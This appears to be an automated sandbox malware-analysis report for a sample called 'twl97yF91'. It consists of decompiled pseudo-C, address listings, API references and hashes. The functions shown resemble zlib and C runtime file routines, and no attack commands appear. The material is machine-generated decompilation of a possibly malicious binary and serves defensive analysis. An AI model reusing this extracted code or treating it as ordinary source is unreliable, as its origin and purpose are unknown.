                                                                                                                                                                                                          						 *_t93 = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                          						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                          						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                          						_t102 = _t101 + 0xc;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                          						_t87 = _t57 + 1;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t82 =  *_t57;
                                                                                                                                                                                                          							_t57 = _t57 + 1;
                                                                                                                                                                                                          						} while (_t82 != 0);
                                                                                                                                                                                                          						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                          						_t103 = _t102 + 4;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                          						if(_t60 == 0) {
                                                                                                                                                                                                          							L30:
                                                                                                                                                                                                          							E00405160(0, _t87, _t93);
                                                                                                                                                                                                          							goto L31;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                          							_t88 = _t60;
                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							if( *_t91 == 0x72) {
                                                                                                                                                                                                          								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t63 =  *_t91;
                                                                                                                                                                                                          							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                          								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t64 =  *_t91;
                                                                                                                                                                                                          							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                          								__eflags = _t64 - 0x66;
                                                                                                                                                                                                          								if(_t64 != 0x66) {
                                                                                                                                                                                                          									__eflags = _t64 - 0x68;
                                                                                                                                                                                                          									if(_t64 != 0x68) {
                                                                                                                                                                                                          										__eflags = _t64 - 0x52;
                                                                                                                                                                                                          										if(_t64 != 0x52) {
                                                                                                                                                                                                          											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                                                                                                          											 *_t89 = _t64;
                                                                                                                                                                                                          											_t87 = _t89 + 1;
                                                                                                                                                                                                          											__eflags = _t87;
                                                                                                                                                                                                          											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t98 = _t64 - 0x30;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t91 = _t91 + 1;
                                                                                                                                                                                                          							if(_t64 == 0) {
                                                                                                                                                                                                          								goto L26;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t87 = _t103 + 0x68;
                                                                                                                                                                                                          							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                          							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                                                                                                          							if(_t65 == 0) {
                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								if(_t65 != 0x77) {
                                                                                                                                                                                                          									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                          									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                                                                                                          									 *_t93 = _t66;
                                                                                                                                                                                                          									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                                                                                                          									_t104 = _t103 + 0x14;
                                                                                                                                                                                                          									__eflags = _t67;
                                                                                                                                                                                                          									if(_t67 != 0) {
                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L34;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_push(0x38);
                                                                                                                                                                                                          									_push("1.2.3");
                                                                                                                                                                                                          									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                                                                                                          									_push(8);
                                                                                                                                                                                                          									_push(0xfffffff1);
                                                                                                                                                                                                          									_push(8);
                                                                                                                                                                                                          									_push(_t98);
                                                                                                                                                                                                          									_push(_t93);
                                                                                                                                                                                                          									_t91 = E00404CE0();
                                                                                                                                                                                                          									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                          									_t104 = _t103 + 0x24;
                                                                                                                                                                                                          									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                                                                                                          									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                                                                                                          									if(_t91 != 0 || _t79 == 0) {
                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										L34:
                                                                                                                                                                                                          										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                                                                                                          										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                                                                                                                                                          										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                          										__eflags = _t69;
                                                                                                                                                                                                          										_push(_t104 + 0x18);
                                                                                                                                                                                                          										if(__eflags >= 0) {
                                                                                                                                                                                                          											_push(_t69);
                                                                                                                                                                                                          											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                          											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                                                                                                          											_t70 = E0040CB9D();
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                                                                                                          										__eflags = _t70;
                                                                                                                                                                                                          										if(_t70 == 0) {
                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                                          											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                                          												E00405000(_t93, 0);
                                                                                                                                                                                                          												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                                          												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                                          												__eflags = _t74;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                                          												return _t93;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                                          												return _t93;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L42;
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							_t62 =  *_t83;
                                                                                                                                                                                                          							 *_t88 = _t62;
                                                                                                                                                                                                          							_t83 = _t83 + 1;
                                                                                                                                                                                                          							_t88 = _t88 + 1;
                                                                                                                                                                                                          							if(_t62 != 0) {
                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L42:
                                                                                                                                                                                                          			}

































                                                                                                                                                                                                          0x004057b7
                                                                                                                                                                                                          0x004057bf
                                                                                                                                                                                                          0x004057c3
                                                                                                                                                                                                          0x004057c5
                                                                                                                                                                                                          0x004057cd
                                                                                                                                                                                                          0x004059c8
                                                                                                                                                                                                          0x004059ce
                                                                                                                                                                                                          0x004057db
                                                                                                                                                                                                          0x004057e3
                                                                                                                                                                                                          0x004057e5
                                                                                                                                                                                                          0x004057ea
                                                                                                                                                                                                          0x00405921
                                                                                                                                                                                                          0x0040592a
                                                                                                                                                                                                          0x004057f0
                                                                                                                                                                                                          0x004057f3
                                                                                                                                                                                                          0x004057f6
                                                                                                                                                                                                          0x004057f9
                                                                                                                                                                                                          0x004057fc
                                                                                                                                                                                                          0x004057ff
                                                                                                                                                                                                          0x00405801
                                                                                                                                                                                                          0x00405804
                                                                                                                                                                                                          0x00405807
                                                                                                                                                                                                          0x0040580a
                                                                                                                                                                                                          0x0040580d
                                                                                                                                                                                                          0x00405810
                                                                                                                                                                                                          0x00405813
                                                                                                                                                                                                          0x00405816
                                                                                                                                                                                                          0x00405819
                                                                                                                                                                                                          0x0040581c
                                                                                                                                                                                                          0x00405824
                                                                                                                                                                                                          0x00405827
                                                                                                                                                                                                          0x0040582b
                                                                                                                                                                                                          0x0040582e
                                                                                                                                                                                                          0x00405831
                                                                                                                                                                                                          0x00405834
                                                                                                                                                                                                          0x00405837
                                                                                                                                                                                                          0x00405837
                                                                                                                                                                                                          0x00405839
                                                                                                                                                                                                          0x0040583a
                                                                                                                                                                                                          0x00405842
                                                                                                                                                                                                          0x00405847
                                                                                                                                                                                                          0x0040584a
                                                                                                                                                                                                          0x0040584f
                                                                                                                                                                                                          0x0040591c
                                                                                                                                                                                                          0x0040591c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405855
                                                                                                                                                                                                          0x00405855
                                                                                                                                                                                                          0x00405859
                                                                                                                                                                                                          0x0040585b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405870
                                                                                                                                                                                                          0x00405872
                                                                                                                                                                                                          0x00405874
                                                                                                                                                                                                          0x00405874
                                                                                                                                                                                                          0x00405877
                                                                                                                                                                                                          0x0040587b
                                                                                                                                                                                                          0x00405881
                                                                                                                                                                                                          0x00405881
                                                                                                                                                                                                          0x00405885
                                                                                                                                                                                                          0x00405889
                                                                                                                                                                                                          0x00405897
                                                                                                                                                                                                          0x00405899
                                                                                                                                                                                                          0x004058a5
                                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                                          0x004058b3
                                                                                                                                                                                                          0x004058b5
                                                                                                                                                                                                          0x004058c1
                                                                                                                                                                                                          0x004058c5
                                                                                                                                                                                                          0x004058c7
                                                                                                                                                                                                          0x004058c7
                                                                                                                                                                                                          0x004058c8
                                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                                          0x00405892
                                                                                                                                                                                                          0x00405892
                                                                                                                                                                                                          0x004058cc
                                                                                                                                                                                                          0x004058cf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004058d1
                                                                                                                                                                                                          0x004058d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004058db
                                                                                                                                                                                                          0x004058db
                                                                                                                                                                                                          0x004058e0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004058e2
                                                                                                                                                                                                          0x004058e4
                                                                                                                                                                                                          0x00405930
                                                                                                                                                                                                          0x0040593f
                                                                                                                                                                                                          0x00405942
                                                                                                                                                                                                          0x00405944
                                                                                                                                                                                                          0x00405949
                                                                                                                                                                                                          0x0040594c
                                                                                                                                                                                                          0x0040594e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405950
                                                                                                                                                                                                          0x00405950
                                                                                                                                                                                                          0x00405953
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405953
                                                                                                                                                                                                          0x004058e6
                                                                                                                                                                                                          0x004058ea
                                                                                                                                                                                                          0x004058ec
                                                                                                                                                                                                          0x004058f1
                                                                                                                                                                                                          0x004058f2
                                                                                                                                                                                                          0x004058f4
                                                                                                                                                                                                          0x004058f6
                                                                                                                                                                                                          0x004058f8
                                                                                                                                                                                                          0x004058f9
                                                                                                                                                                                                          0x00405904
                                                                                                                                                                                                          0x00405906
                                                                                                                                                                                                          0x0040590b
                                                                                                                                                                                                          0x0040590e
                                                                                                                                                                                                          0x00405911
                                                                                                                                                                                                          0x00405916
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405955
                                                                                                                                                                                                          0x00405955
                                                                                                                                                                                                          0x00405955
                                                                                                                                                                                                          0x00405961
                                                                                                                                                                                                          0x00405963
                                                                                                                                                                                                          0x00405967
                                                                                                                                                                                                          0x0040596d
                                                                                                                                                                                                          0x0040596e
                                                                                                                                                                                                          0x0040597c
                                                                                                                                                                                                          0x0040597d
                                                                                                                                                                                                          0x00405970
                                                                                                                                                                                                          0x00405970
                                                                                                                                                                                                          0x00405974
                                                                                                                                                                                                          0x00405975
                                                                                                                                                                                                          0x00405975
                                                                                                                                                                                                          0x00405985
                                                                                                                                                                                                          0x00405988
                                                                                                                                                                                                          0x0040598a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040598c
                                                                                                                                                                                                          0x0040598c
                                                                                                                                                                                                          0x00405990
                                                                                                                                                                                                          0x004059a5
                                                                                                                                                                                                          0x004059ad
                                                                                                                                                                                                          0x004059b6
                                                                                                                                                                                                          0x004059b6
                                                                                                                                                                                                          0x004059b9
                                                                                                                                                                                                          0x004059c5
                                                                                                                                                                                                          0x00405992
                                                                                                                                                                                                          0x00405992
                                                                                                                                                                                                          0x004059a2
                                                                                                                                                                                                          0x004059a2
                                                                                                                                                                                                          0x00405990
                                                                                                                                                                                                          0x0040598a
                                                                                                                                                                                                          0x00405916
                                                                                                                                                                                                          0x004058e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405860
                                                                                                                                                                                                          0x00405860
                                                                                                                                                                                                          0x00405862
                                                                                                                                                                                                          0x00405864
                                                                                                                                                                                                          0x00405865
                                                                                                                                                                                                          0x00405868
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040586a
                                                                                                                                                                                                          0x0040586a
                                                                                                                                                                                                          0x0040586d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405868
                                                                                                                                                                                                          0x0040584f
                                                                                                                                                                                                          0x004057ea
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                          • String ID: 1.2.3
                                                                                                                                                                                                          • API String ID: 680241177-2310465506
                                                                                                                                                                                                          • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                          • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3886058894-0
                                                                                                                                                                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                          • Instruction ID: 26cd10436aaa824d860efe8b52f370e482b9e09f2abf472120a144d091e75976
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2351D671900209EFCB228F799C485DEBBB5EF90368F14822AFC2596190D7719F51DF91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                          			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                          				intOrPtr* _t92;
                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                          				char _t97;
                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                          				signed int _t107;
                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                          				signed int _t113;
                                                                                                                                                                                                          				intOrPtr* _t114;
                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                          				signed int _t119;
                                                                                                                                                                                                          				signed int _t120;
                                                                                                                                                                                                          				char* _t121;
                                                                                                                                                                                                          				signed int _t125;
                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                          				signed int _t133;
                                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t125 = __edx;
                                                                                                                                                                                                          				_t121 = _a4;
                                                                                                                                                                                                          				_t119 = _a8;
                                                                                                                                                                                                          				_t131 = 0;
                                                                                                                                                                                                          				_v12 = _t121;
                                                                                                                                                                                                          				_v8 = _t119;
                                                                                                                                                                                                          				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t138 = _t121;
                                                                                                                                                                                                          					if(_t121 != 0) {
                                                                                                                                                                                                          						_t133 = _a20;
                                                                                                                                                                                                          						__eflags = _t133;
                                                                                                                                                                                                          						if(_t133 == 0) {
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							__eflags = _t119 - 0xffffffff;
                                                                                                                                                                                                          							if(_t119 != 0xffffffff) {
                                                                                                                                                                                                          								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                                                                                                                                                          								_t134 = _t134 + 0xc;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t133 - _t131;
                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                          								goto L3;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t94 = _t90 | 0xffffffff;
                                                                                                                                                                                                          								_t125 = _t94 % _a12;
                                                                                                                                                                                                          								__eflags = _a16 - _t94 / _a12;
                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                          									goto L3;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                          								_t131 = _a12 * _a16;
                                                                                                                                                                                                          								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                          								_v20 = _t131;
                                                                                                                                                                                                          								_t120 = _t131;
                                                                                                                                                                                                          								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                          									_v16 = 0x1000;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t131;
                                                                                                                                                                                                          								if(_t131 == 0) {
                                                                                                                                                                                                          									L40:
                                                                                                                                                                                                          									return _a16;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									do {
                                                                                                                                                                                                          										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                          										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                          											L24:
                                                                                                                                                                                                          											__eflags = _t120 - _v16;
                                                                                                                                                                                                          											if(_t120 < _v16) {
                                                                                                                                                                                                          												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                                          												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                                          												if(_t97 == 0xffffffff) {
                                                                                                                                                                                                          													L48:
                                                                                                                                                                                                          													return (_t131 - _t120) / _a12;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags = _v8;
                                                                                                                                                                                                          												if(_v8 == 0) {
                                                                                                                                                                                                          													L44:
                                                                                                                                                                                                          													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                          													if(__eflags != 0) {
                                                                                                                                                                                                          														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                          														_t134 = _t134 + 0xc;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													L4:
                                                                                                                                                                                                          													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                                          													goto L5;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t123 = _v12;
                                                                                                                                                                                                          												_v12 = _v12 + 1;
                                                                                                                                                                                                          												 *_v12 = _t97;
                                                                                                                                                                                                          												_t120 = _t120 - 1;
                                                                                                                                                                                                          												_t70 =  &_v8;
                                                                                                                                                                                                          												 *_t70 = _v8 - 1;
                                                                                                                                                                                                          												__eflags =  *_t70;
                                                                                                                                                                                                          												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _v16;
                                                                                                                                                                                                          											if(_v16 == 0) {
                                                                                                                                                                                                          												_t105 = 0x7fffffff;
                                                                                                                                                                                                          												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                          												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                          													_t105 = _t120;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                          												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                          													_t55 = _t120 % _v16;
                                                                                                                                                                                                          													__eflags = _t55;
                                                                                                                                                                                                          													_t125 = _t55;
                                                                                                                                                                                                          													_t110 = _t120;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                          													_t110 = 0x7fffffff;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t105 = _t110 - _t125;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t105 - _v8;
                                                                                                                                                                                                          											if(_t105 > _v8) {
                                                                                                                                                                                                          												goto L44;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_push(_t105);
                                                                                                                                                                                                          												_push(_v12);
                                                                                                                                                                                                          												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                          												_pop(_t123);
                                                                                                                                                                                                          												_push(_t106);
                                                                                                                                                                                                          												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                          												_t134 = _t134 + 0xc;
                                                                                                                                                                                                          												__eflags = _t107;
                                                                                                                                                                                                          												if(_t107 == 0) {
                                                                                                                                                                                                          													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                          													goto L48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                          												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                          													L47:
                                                                                                                                                                                                          													_t80 = _t133 + 0xc;
                                                                                                                                                                                                          													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                          													__eflags =  *_t80;
                                                                                                                                                                                                          													goto L48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_v12 = _v12 + _t107;
                                                                                                                                                                                                          												_t120 = _t120 - _t107;
                                                                                                                                                                                                          												_v8 = _v8 - _t107;
                                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                          										__eflags = _t113;
                                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										if(__eflags < 0) {
                                                                                                                                                                                                          											goto L47;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t131 = _t120;
                                                                                                                                                                                                          										__eflags = _t120 - _t113;
                                                                                                                                                                                                          										if(_t120 >= _t113) {
                                                                                                                                                                                                          											_t131 = _t113;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _t131 - _v8;
                                                                                                                                                                                                          										if(_t131 > _v8) {
                                                                                                                                                                                                          											_t133 = 0;
                                                                                                                                                                                                          											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                          												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                          												_t134 = _t134 + 0xc;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											 *_t114 = 0x22;
                                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                                          											goto L4;
